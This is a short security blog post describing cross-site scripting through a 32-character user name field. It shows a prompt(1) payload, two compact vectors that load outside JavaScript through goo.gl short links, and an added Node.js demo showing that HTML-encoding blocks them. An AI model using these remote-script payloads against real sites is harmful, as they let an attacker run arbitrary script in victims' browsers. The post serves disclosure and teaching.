Tiny XSS exploitation

A well-known website had a limit of 32 chars on the user name field that was reflected in the public profile area.
That field allowed XSS exploitation:

[code lang="html"]
d<img src=x onerror=prompt(1)>
[/code]

Simple right?
But sometimes you need to provide a better vector, one where the affected company can see more than a prompt with a number. They also know their text field is limited to 32 chars.

I found two methods, using SCRIPT and IFRAME.
When I tried this with a tiny URL (is.gd) pointing to my XSS code at davidsopas.com, I realized that the vector wasn't executing.
Why? The site required HTTPS.

I searched for a URL shortener that provided HTTPS, and Google provided me with one: goo.gl.

So my final vector was:

[code lang="html"]
<script src=//goo.gl/TJnzmV>
<iframe src=//goo.gl/xWYG4f>
[/code]

29 chars, and I could use any JavaScript I wanted.
It was fun!
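As an added example (my own code, not from the original post), here is a small Node.js script showing that a length check like the site's 32-char limit lets both vectors above straight through, while HTML-encoding the name where it is reflected turns them into harmless text. The `renderProfile*` functions are assumed stand-ins for how such a profile page might build its markup.

```javascript
// Added example, not from the original post: a 32-char length limit on the
// user name field does nothing against the short vectors above; encoding the
// name for an HTML text context where it is reflected does. Node.js, no deps.
const MAX_NAME_LEN = 32;

// The two payloads from the post (constructed here for the demo).
const PAYLOADS = [
  '<script src=//goo.gl/TJnzmV>',
  '<iframe src=//goo.gl/xWYG4f>',
];

// The validation the site relied on: length only.
function passesLengthCheck(name) {
  return name.length <= MAX_NAME_LEN;
}

// Vulnerable rendering (assumed): the name is dropped into the page as-is.
function renderProfileUnsafe(name) {
  return `<span class="name">${name}</span>`;
}

// Encode for an HTML text context so the name can only ever be text.
function htmlEncode(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same markup, encoded user input.
function renderProfileSafe(name) {
  return `<span class="name">${htmlEncode(name)}</span>`;
}

// Crude check: does the fragment open any tag other than the template's
// own <span>? If so, user input has become markup.
function introducesTag(html) {
  const tags = html.match(/<\/?[a-z][a-z0-9]*/gi) || [];
  return tags.some((t) => !/^<\/?span$/i.test(t));
}

// Summarise each payload: length check passes, unsafe render injects,
// safe render does not.
function demo() {
  return PAYLOADS.map((p) => ({
    payload: p,
    passesLengthCheck: passesLengthCheck(p),
    unsafeInjects: introducesTag(renderProfileUnsafe(p)),
    safeInjects: introducesTag(renderProfileSafe(p)),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```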

You guys have any other method you like to share?

By David Sopas

-alert(/what/)-
